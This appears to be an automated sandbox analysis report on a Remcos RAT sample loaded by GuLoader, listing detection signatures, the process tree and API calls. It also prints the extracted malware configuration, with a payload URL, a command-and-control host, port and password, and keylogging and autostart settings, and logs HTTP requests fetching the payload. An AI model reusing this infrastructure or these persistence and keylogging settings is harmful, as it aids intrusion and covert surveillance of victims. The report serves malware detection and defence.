Loading ...

Play interactive tourEdit tour

Windows Analysis Report mU9H96igb3.exe

Overview

General Information

Sample Name:mU9H96igb3.exe
Analysis ID:1662
MD5:8777020a37b6797241a489a707b9784b
SHA1:a1ed1029b967295f9ce5e9d219f41dc6c7fc4d1a
SHA256:8a45d901cab57a1b65c32aea2452f56436dcf01c37bdf7875838e6054f395d90
Infos:

Most interesting Screenshot:

Detection

Remcos GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Detected Remcos RAT
GuLoader behavior detected
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect Any.run
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates an undocumented autostart registry key
Sigma detected: WScript or CScript Dropper
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • mU9H96igb3.exe (PID: 4448 cmdline: 'C:\Users\user\Desktop\mU9H96igb3.exe' MD5: 8777020A37B6797241A489A707B9784B)
    • mU9H96igb3.exe (PID: 6380 cmdline: 'C:\Users\user\Desktop\mU9H96igb3.exe' MD5: 8777020A37B6797241A489A707B9784B)
      • wscript.exe (PID: 512 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
        • cmd.exe (PID: 6504 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • Dlls.exe (PID: 2916 cmdline: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe MD5: 8777020A37B6797241A489A707B9784B)
            • Dlls.exe (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe MD5: 8777020A37B6797241A489A707B9784B)
  • Dlls.exe (PID: 2072 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)
  • Dlls.exe (PID: 6216 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)
    • Dlls.exe (PID: 3384 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)
  • Dlls.exe (PID: 7300 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)
    • Dlls.exe (PID: 4696 cmdline: 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe' MD5: 8777020A37B6797241A489A707B9784B)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://implantecapilarpereira.com/NetGen"}

Threatname: Remcos

{"Host:Port:Password": "monitprradministratioran.loseyourip.com:24091:1", "Assigned name": "NetGeneration", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "Dlls.exe", "Startup value": "Chrome", "Hide file": "Enable", "Mutex": "Remcos-HCJBCA", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobes", "Keylog folder": "Adobes", "Keylog file max size": "20000"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000F.00000002.138446041726.0000000002C10000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 11 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Suspicious Script Execution From Temp FolderShow sources
            Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\mU9H96igb3.exe' , ParentImage: C:\Users\user\Desktop\mU9H96igb3.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , ProcessId: 512
            Sigma detected: WScript or CScript DropperShow sources
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\mU9H96igb3.exe' , ParentImage: C:\Users\user\Desktop\mU9H96igb3.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , ProcessId: 512

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "monitprradministratioran.loseyourip.com:24091:1", "Assigned name": "NetGeneration", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "Dlls.exe", "Startup value": "Chrome", "Hide file": "Enable", "Mutex": "Remcos-HCJBCA", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobes", "Keylog folder": "Adobes", "Keylog file max size": "20000"}
            Source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://implantecapilarpereira.com/NetGen"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: mU9H96igb3.exeVirustotal: Detection: 32%Perma Link
            Source: mU9H96igb3.exeMetadefender: Detection: 25%Perma Link
            Source: mU9H96igb3.exeReversingLabs: Detection: 24%
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: mU9H96igb3.exeAvira: detected
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeAvira: detection malicious, Label: TR/AD.Nekark.fexqx
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeMetadefender: Detection: 25%Perma Link
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeReversingLabs: Detection: 24%
            Source: 21.0.Dlls.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: 16.0.Dlls.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: 19.0.Dlls.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: 16.2.Dlls.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: 17.0.Dlls.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: 18.0.Dlls.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: 2.0.mU9H96igb3.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: 9.0.mU9H96igb3.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: 15.0.Dlls.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: 20.0.Dlls.exe.400000.0.unpackAvira: Label: TR/AD.Nekark.fexqx
            Source: mU9H96igb3.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

            Networking:

            barindex
            Connects to many ports of the same IP (likely port scanning)Show sources
            Source: global trafficTCP traffic: 8.6.8.23 ports 0,1,2,4,9,24091
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://implantecapilarpereira.com/NetGen
            Source: Malware configuration extractorURLs: monitprradministratioran.loseyourip.com
            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
            Source: Joe Sandbox ViewASN Name: MASTER-ASCzechRepublicwwwmasterczCZ MASTER-ASCzechRepublicwwwmasterczCZ
            Source: global trafficHTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49809 -> 8.6.8.23:24091
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmpString found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin
            Source: Dlls.exe, 00000014.00000002.139080944862.00000000007B4000.00000004.00000020.sdmpString found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binHR
            Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmpString found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarperei
            Source: Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmpString found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binn
            Source: mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmpString found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bint
            Source: mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmpString found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binx
            Source: unknownDNS traffic detected: queries for: implantecapilarpereira.com
            Source: global trafficHTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Installs a global keyboard hookShow sources
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Adobes\Dlls.exe

            E-Banking Fraud:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR

            System Summary:

            barindex
            Potential malicious icon foundShow sources
            Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
            Source: mU9H96igb3.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF4B8B
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02C0474A
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF087E
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF557A
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BE4AA2
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02C01BCE
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF6BF6
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02C0130A
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BFECDD
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF00C6
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BFE400
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF7574
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0058474A
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0057557A
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00574B8B
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0057087E
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0057E400
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0057ECDD
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_005700C6
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_005800B4
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00564AA2
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00577574
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0058130A
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00581BCE
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00576BF6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C24B8B
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C3474A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C2087E
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C2557A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C14AA2
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C31BCE
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C26BF6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C3130A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C200C6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C2ECDD
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C2E400
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C27574
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F6087E
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F64B8B
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F6557A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F7474A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F6ECDD
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F600C6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F54AA2
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F6E400
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F66BF6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F71BCE
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F67574
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F7130A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0235087E
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0235557A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0236474A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_02354B8B
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0235E400
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_02344AA2
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0235ECDD
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_023500C6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0236130A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_02357574
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_02356BF6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_02361BCE
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_0058474A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_0057557A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_00574B8B
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_0057087E
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_0057E400
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_0057ECDD
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_005700C6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_005800B4
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_00564AA2
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_00577574
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_0058130A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_00581BCE
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_00576BF6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_0058474A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_0057557A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_00574B8B
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_0057087E
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_0057E400
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_0057ECDD
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_005700C6
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_005800B4
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_00564AA2
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_00577574
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_0058130A
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_00581BCE
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_00576BF6
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02C0474A NtSetInformationThread,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02C04084 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF087E NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF557A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02C0130A NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF7574 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00586E0F NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00584084 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00566970 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0057557A NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C3474A NtSetContextThread,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C34084 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C2087E NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C2557A NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C3130A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C27574 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F74084 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F6087E NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F6557A NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F7474A NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F67574 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F7130A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0235087E NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_02364084 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0235557A NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0236474A NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0236130A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_02357574 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 19_2_0058727E Sleep,NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 19_2_00586E0F NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 19_2_00586CD1 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 19_2_00586E17 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 19_2_005873EB NtProtectVirtualMemory,
